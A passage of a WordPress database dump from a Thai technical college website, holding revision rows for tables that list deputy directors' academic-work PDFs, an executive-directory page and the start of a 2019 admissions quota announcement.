(4209, 1, '2018-11-02 16:22:42', '2018-11-02 09:22:42', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'publish', 'closed', 'closed', '', 'copy-of-academic-works-for-manager', '', '', '2018-11-02 17:17:35', '2018-11-02 10:17:35', '', 0, 'http://www.technicrayong.ac.th/?post_type=tablepress_table&p=4209', 0, 'tablepress_table', 'application/json', 0),
(4210, 1, '2018-11-02 16:25:11', '2018-11-02 09:25:11', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', '', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:25:11', '2018-11-02 09:25:11', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4211, 1, '2018-11-02 16:34:09', '2018-11-02 09:34:09', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e27\\u0e34\\u0e0a\\u0e32\\u0e01\\u0e32\\u0e23\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-11-02 16:34:09', '2018-11-02 09:34:09', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(4212, 1, '2018-11-02 16:34:34', '2018-11-02 09:34:34', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:34:34', '2018-11-02 09:34:34', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4214, 1, '2018-11-02 16:40:49', '2018-11-02 09:40:49', '', 'Yuttana-Academic-Works', '', 'inherit', 'closed', 'closed', '', 'yuttana-academic-works', '', '', '2018-11-02 16:40:49', '2018-11-02 09:40:49', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/Yuttana-Academic-Works.pdf', 0, 'attachment', 'application/pdf', 0),
(4215, 1, '2018-11-02 16:41:55', '2018-11-02 09:41:55', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:41:55', '2018-11-02 09:41:55', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4216, 1, '2018-11-02 16:43:17', '2018-11-02 09:43:17', '<a href=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\n<p style=\"text-align: center;\">[table id=1 /]</p>\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/yuttana.jpg\"><img class=\"alignnone size-full wp-image-639\" src=\"/wp-content/uploads/2018/01/yuttana.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a></p>', 'ผลงานวิชาการของผู้บริหาร', '', 'inherit', 'closed', 'closed', '', '2046-autosave-v1', '', '', '2018-11-02 16:43:17', '2018-11-02 09:43:17', '', 2046, 'http://www.technicrayong.ac.th/2046-autosave-v1/', 0, 'revision', '', 0),
(4217, 1, '2018-11-02 16:44:00', '2018-11-02 09:44:00', '<a href=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n<p style=\"text-align: center;\">[table id=1 /]</p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/yuttana.jpg\"><img class=\"alignnone size-full wp-image-639\" src=\"/wp-content/uploads/2018/01/yuttana.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a></p>\r\n<p style=\"text-align: center;\">[table id=3 /]</p>', 'ผลงานวิชาการของผู้บริหาร', '', 'inherit', 'closed', 'closed', '', '2046-revision-v1', '', '', '2018-11-02 16:44:00', '2018-11-02 09:44:00', '', 2046, 'http://www.technicrayong.ac.th/2046-revision-v1/', 0, 'revision', '', 0),
(4218, 1, '2018-11-02 16:45:58', '2018-11-02 09:45:58', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:45:58', '2018-11-02 09:45:58', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4219, 1, '2018-11-02 16:47:28', '2018-11-02 09:47:28', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"<center>\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e27\\u0e34\\u0e0a\\u0e32\\u0e01\\u0e32\\u0e23<\\/center>\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-11-02 16:47:28', '2018-11-02 09:47:28', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(4220, 1, '2018-11-02 16:49:44', '2018-11-02 09:49:44', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e27\\u0e34\\u0e0a\\u0e32\\u0e01\\u0e32\\u0e23\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-11-02 16:49:44', '2018-11-02 09:49:44', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(4221, 1, '2018-11-02 16:52:38', '2018-11-02 09:52:38', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"<br><br><br><br><br>\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:52:38', '2018-11-02 09:52:38', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4222, 1, '2018-11-02 16:53:21', '2018-11-02 09:53:21', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:53:21', '2018-11-02 09:53:21', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4223, 1, '2018-11-02 16:54:04', '2018-11-02 09:54:04', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:54:04', '2018-11-02 09:54:04', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4224, 1, '2018-11-02 16:56:41', '2018-11-02 09:56:41', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\" \\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:56:41', '2018-11-02 09:56:41', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4225, 1, '2018-11-02 16:57:16', '2018-11-02 09:57:16', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\n \\n \\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:57:16', '2018-11-02 09:57:16', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4226, 1, '2018-11-02 16:58:00', '2018-11-02 09:58:00', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\" \\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 16:58:00', '2018-11-02 09:58:00', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4227, 1, '2018-11-02 17:07:45', '2018-11-02 10:07:45', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\" \\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 17:07:45', '2018-11-02 10:07:45', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4228, 1, '2018-11-02 17:13:40', '2018-11-02 10:13:40', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\" \\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-11-02 17:13:40', '2018-11-02 10:13:40', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(4229, 1, '2018-11-02 17:16:37', '2018-11-02 10:16:37', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e32\\u0e01\\u0e23\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-11-02 17:16:37', '2018-11-02 10:16:37', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(4230, 1, '2018-11-02 17:17:35', '2018-11-02 10:17:35', '[[\"\\u0e19\\u0e32\\u0e22\\u0e22\\u0e38\\u0e17\\u0e18\\u0e19\\u0e32 \\u0e2d\\u0e48\\u0e2d\\u0e19\\u0e2a\\u0e49\\u0e21\\u0e01\\u0e24\\u0e29\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e01\\u0e34\\u0e08\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e19\\u0e31\\u0e01\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/11\\/Yuttana-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager 2', 'รองยุทธนา', 'inherit', 'closed', 'closed', '', '4209-revision-v1', '', '', '2018-11-02 17:17:35', '2018-11-02 10:17:35', '', 4209, 'http://www.technicrayong.ac.th/4209-revision-v1/', 0, 'revision', '', 0),
(4232, 3, '2018-11-05 13:21:10', '2018-11-05 06:21:10', '', 'ทำเนียบผู้บริหาร วิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%97%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b8%9a%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5', '', '', '2018-11-05 13:21:10', '2018-11-05 06:21:10', '', 0, 'http://www.technicrayong.ac.th/?page_id=4232', 0, 'page', '', 0),
(4233, 3, '2018-11-05 13:21:10', '2018-11-05 06:21:10', '', 'ทำเนียบผู้บริหาร วิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '4232-revision-v1', '', '', '2018-11-05 13:21:10', '2018-11-05 06:21:10', '', 4232, 'http://www.technicrayong.ac.th/4232-revision-v1/', 0, 'revision', '', 0),
(4234, 3, '2018-11-05 14:55:45', '2018-11-05 07:55:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%8A%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%A1%E0%B8%B1%E0%B8%98%E0%B8%A2%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%9B%E0%B8%B5%E0%B8%97%E0%B8%B5%E0%B9%88-3-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2562-2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การรับนักเรียนชั้นมัธยมศึกษาปีที่ 3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) มัธยมศึกษาปีที่ 6 และประกาศนียบัตรวิชาชีพ (ปวช.) เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) เป็นกรณีพิเศษ (โควตา) ประจำปีการศึกษา 2562', '', 'publish', 'closed', 'open', '', 